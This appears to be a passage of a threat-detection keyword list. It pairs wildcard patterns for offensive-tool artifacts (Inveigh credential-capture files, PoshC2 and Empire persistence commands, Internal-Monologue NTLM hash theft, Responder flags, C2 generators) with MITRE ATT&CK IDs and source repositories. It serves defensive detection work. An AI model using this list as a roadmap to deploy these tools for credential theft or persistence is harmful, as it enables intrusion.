-*install_pywhisker*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_pywsus*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_responder*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_roastinthemiddle*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_ruler*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*install_rusthound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_shadowcoerce*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_smartbrute*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_smbmap*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_smtp-user-enum*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_sprayhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_targetedKerberoast*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_webclientservicescanner*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_windapsearch-go*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*install_winrar_wine32.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*install_winrar_wine64.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*install_zerologon*,offensive_tool_keyword,exegol,Fully featured and 
community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*installexe-persistence*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Install-Module ps2exe*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*install-persistence*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z 
-*install-persistence-cron*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
-*Install-ServiceBinary*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Install-SSP -Path*.dll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Install-SSP.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Install-SSP.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*interactsh -*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C10,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,0,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z
-*interactsh*.exe,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C9,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z
-*interactsh*oast.*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C14,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z
-*interactsh-client -*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C11,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,0,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z
-*interactsh-server -*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C13,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,0,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z
-*Intercepter-NG*,offensive_tool_keyword,Intercepter-NG,android wifi sniffer,T1433,TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/intercepter-ng,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*--interface * --wpad --lm --disable-ess*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*Internal-Monologue.exe*,offensive_tool_keyword,Internal-Monologue,Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS,T1003 - T1051 - T1574 - T1110 - T1547,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/eladshamir/Internal-Monologue,1,1,N/A,N/A,10,1283,243,2018-10-11T12:13:08Z,2017-12-09T05:59:01Z
-*InternalMonologueDll*,offensive_tool_keyword,Internal-Monologue,Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS,T1003 - T1051 - T1574 - T1110 - T1547,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/eladshamir/Internal-Monologue,1,1,N/A,N/A,10,1283,243,2018-10-11T12:13:08Z,2017-12-09T05:59:01Z
-*InternalMonologueExe*,offensive_tool_keyword,Internal-Monologue,Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS,T1003 - T1051 - T1574 - T1110 - T1547,TA0003 - TA0006,N/A,N/A,Credential Access,https://github.com/eladshamir/Internal-Monologue,1,1,N/A,N/A,10,1283,243,2018-10-11T12:13:08Z,2017-12-09T05:59:01Z
-*InternetCrackUrl*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z
-*IntruderPayloads*,offensive_tool_keyword,IntruderPayloads,A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.,T1101 - T1114 - T1324 - T1559,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/1N3/IntruderPayloads,1,0,N/A,N/A,10,3429,1190,2021-09-27T01:47:05Z,2015-10-29T14:57:06Z
-*invalid certificate signing key*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z
-*invalid elliptic curve value*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z
-*-Inveigh *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Inveigh Relay*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Inveigh.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z
-*Inveigh.ps1*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z
-*Inveigh.psd1*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z
-*Inveigh.psm1*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z
-*Inveigh.sln*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z
-*inveigh_version*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Inveigh-Cleartext.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z
-*Inveigh-FormInput.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z
-*Inveigh-Log.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-master*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-net*.zip*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-NTLMv1.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Inveigh-NTLMv2.txt*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & 